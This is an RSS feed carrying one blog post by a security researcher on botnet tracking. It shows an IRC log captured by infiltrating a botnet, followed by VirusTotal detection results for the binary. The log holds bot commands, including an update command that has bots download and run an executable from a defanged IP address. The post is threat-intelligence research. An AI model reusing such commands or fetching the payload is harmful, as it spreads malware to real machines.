<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>onHacks &#187; Botnet</title>
	<atom:link href="http://onhacks.org/lang/en/tag/botnet/feed/" rel="self" type="application/rss+xml" />
	<link>http://onhacks.org</link>
	<description>On Hacking Across Boundaries</description>
	<lastBuildDate>Wed, 02 Jun 2010 05:48:30 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Botnet Update In Action</title>
		<link>http://onhacks.org/lang/en/2009/08/23/botnet-update-in-action</link>
		<comments>http://onhacks.org/lang/en/2009/08/23/botnet-update-in-action#comments</comments>
		<pubDate>Sun, 23 Aug 2009 15:00:00 +0000</pubDate>
		<dc:creator>log0</dc:creator>
				<category><![CDATA[Honeypot]]></category>
		<category><![CDATA[Botnet]]></category>
		<category><![CDATA[Tracking Botnets]]></category>

		<guid isPermaLink="false">http://onhacks.org/?p=600</guid>
		<description><![CDATA[I am currently developing a tool to automate tracking botnets. Input is a folder of binaries, and output is endless bot logs (commands, conversations, how they work), plus (possibly unseen. undetected) malware binaries and hopefully automated analysis too. =) Here is something my tool caught while I was testing on a botnet. I used one [...]]]></description>
			<content:encoded><![CDATA[<p><span lang="en">I am currently developing a tool to automate tracking botnets. Input is a folder of binaries, and output is endless bot logs (commands, conversations, how they work), plus (possibly unseen. undetected) malware binaries and hopefully automated analysis too. =)</span></p>
<p><span lang="en">Here is something my tool caught while I was testing on a botnet. I used one of the malware binaries caught by <a href="http://onhacks.org/lang/en/2009/07/21/who-is-hacking-me" target="_blank">my honeypot</a> to infiltrate the botnet =) They are paying off!</span></p>




<blockquote><p>2009-08-23 18:27:20,644 &#8211; log-6 &#8211; INFO &#8211; Received : [:irc.efnet.com 332 [ #xx6 :.flushdns &#124;.down -S &#124;.update -S &#124;.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]</p></blockquote>
<p><span lang="en">There is some Deutsch (German) stuffs&#8230; not necessarily their stuffs though. Disconnected me.</span></p>


<blockquote><p>ERROR :Closing Link: [[&#60;my ip, removed!!!&#62;] (Client hat die Verbindung getrennt)</p></blockquote>
<p><span lang="en">The binary is very new, just 4 hours ago at 2009-08-23 18:27:20,644 ( GMT +8 ).</span></p>
<p><span lang="en">The binary at http://94[dot]76[dot]194[dot]116/xx8.exe (MD5sum : 7904937c07c031e81023dbd81ac93b64) has VirusTotal results :</span></p>




<blockquote><p>File winhost.exe received on 2009.08.22 15:54:06 (UTC)<br />
Current status: 			    finished</p>
<div id="status_porcentaje">Result: <span><span style="color: red;">6</span></span>/41 (14.63%)</div>
<div><span lang="en"><br />
</span></div>
<div>
<table id="tablaMotores" border="0" cellspacing="0" cellpadding="0" width="550">
<tbody>
<tr>
<th>Antivirus</th>
<th>Version</th>
<th>Last Update</th>
<th>Result</th>
</tr>
<tr>
<td>a-squared</td>
<td>4.5.0.24</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>AhnLab-V3</td>
<td>5.0.0.2</td>
<td>2009.08.21</td>
<td>-</td>
</tr>
<tr>
<td>AntiVir</td>
<td>7.9.1.3</td>
<td>2009.08.21</td>
<td>-</td>
</tr>
<tr>
<td>Antiy-AVL</td>
<td>2.0.3.7</td>
<td>2009.08.21</td>
<td>-</td>
</tr>
<tr>
<td>Authentium</td>
<td>5.1.2.4</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Avast</td>
<td>4.8.1335.0</td>
<td>2009.08.21</td>
<td>-</td>
</tr>
<tr>
<td>AVG</td>
<td>8.5.0.406</td>
<td>2009.08.22</td>
<td>Worm/Generic.AHOV</td>
</tr>
<tr>
<td>BitDefender</td>
<td>7.2</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>10.00</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>ClamAV</td>
<td>0.94.1</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Comodo</td>
<td>2058</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>DrWeb</td>
<td>5.0.0.12182</td>
<td>2009.08.22</td>
<td>BackDoor.IRC.Bot.127</td>
</tr>
<tr>
<td>eSafe</td>
<td>7.0.17.0</td>
<td>2009.08.20</td>
<td>-</td>
</tr>
<tr>
<td>eTrust-Vet</td>
<td>31.6.6694</td>
<td>2009.08.21</td>
<td>-</td>
</tr>
<tr>
<td>F-Prot</td>
<td>4.4.4.56</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>F-Secure</td>
<td>8.0.14470.0</td>
<td>2009.08.21</td>
<td>-</td>
</tr>
<tr>
<td>Fortinet</td>
<td>3.120.0.0</td>
<td>2009.08.22</td>
<td>PossibleThreat</td>
</tr>
<tr>
<td>GData</td>
<td>19</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Ikarus</td>
<td>T3.1.1.68.0</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Jiangmin</td>
<td>11.0.800</td>
<td>2009.08.21</td>
<td>-</td>
</tr>
<tr>
<td>K7AntiVirus</td>
<td>7.10.825</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Kaspersky</td>
<td>7.0.0.125</td>
<td>2009.08.22</td>
<td><strong>Net-Worm.Win32.Kolab.dpo</strong></td>
</tr>
<tr>
<td>McAfee</td>
<td>5716</td>
<td>2009.08.21</td>
<td>-</td>
</tr>
<tr>
<td>McAfee+Artemis</td>
<td>5716</td>
<td>2009.08.21</td>
<td>Artemis!7904937C07C0</td>
</tr>
<tr>
<td>McAfee-GW-Edition</td>
<td>6.8.5</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Microsoft</td>
<td>1.4903</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>NOD32</td>
<td>4358</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Norman</td>
<td>6.01.09</td>
<td>2009.08.21</td>
<td>-</td>
</tr>
<tr>
<td>nProtect</td>
<td>2009.1.8.0</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Panda</td>
<td>10.0.0.14</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>PCTools</td>
<td>4.4.2.0</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Prevx</td>
<td>3.0</td>
<td>2009.08.22</td>
<td>Low Risk Adware</td>
</tr>
<tr>
<td>Rising</td>
<td>21.43.50.00</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Sophos</td>
<td>4.44.0</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Sunbelt</td>
<td>3.2.1858.2</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>Symantec</td>
<td>1.4.4.12</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>TheHacker</td>
<td>6.3.4.3.385</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>TrendMicro</td>
<td>8.950.0.1094</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>VBA32</td>
<td>3.12.10.9</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>ViRobot</td>
<td>2009.8.22.1897</td>
<td>2009.08.22</td>
<td>-</td>
</tr>
<tr>
<td>VirusBuster</td>
<td>4.6.5.0</td>
<td>2009.08.21</td>
<td>-</td>
</tr>
</tbody>
</table>
</div>
</blockquote>
<p><span lang="en"><strong>Detection rate 14.63%! </strong>Only 6/41 scanners detected it. Except Kaspersky, AVG, and DrWeb, the other 3 seems to give uncertain generic results.</span></p>
<p><span lang="en">Which scanner are you using?</span></p>




<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px;">
<p>我在寫一個自動化工具去追蹤殭屍網絡。只要一堆 EXE，就自動產生一堆殭屍網絡的實況（指令、對話、如何運作）、(有可能是未被發現及不能檢測到的)惡意檔及（希望未來能有的）自動化分析。</p>
<p>這是我的工具在測試時從殭屍網絡抓到的東東：</p></div>
]]></content:encoded>
			<wfw:commentRss>http://onhacks.org/lang/en/2009/08/23/botnet-update-in-action/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
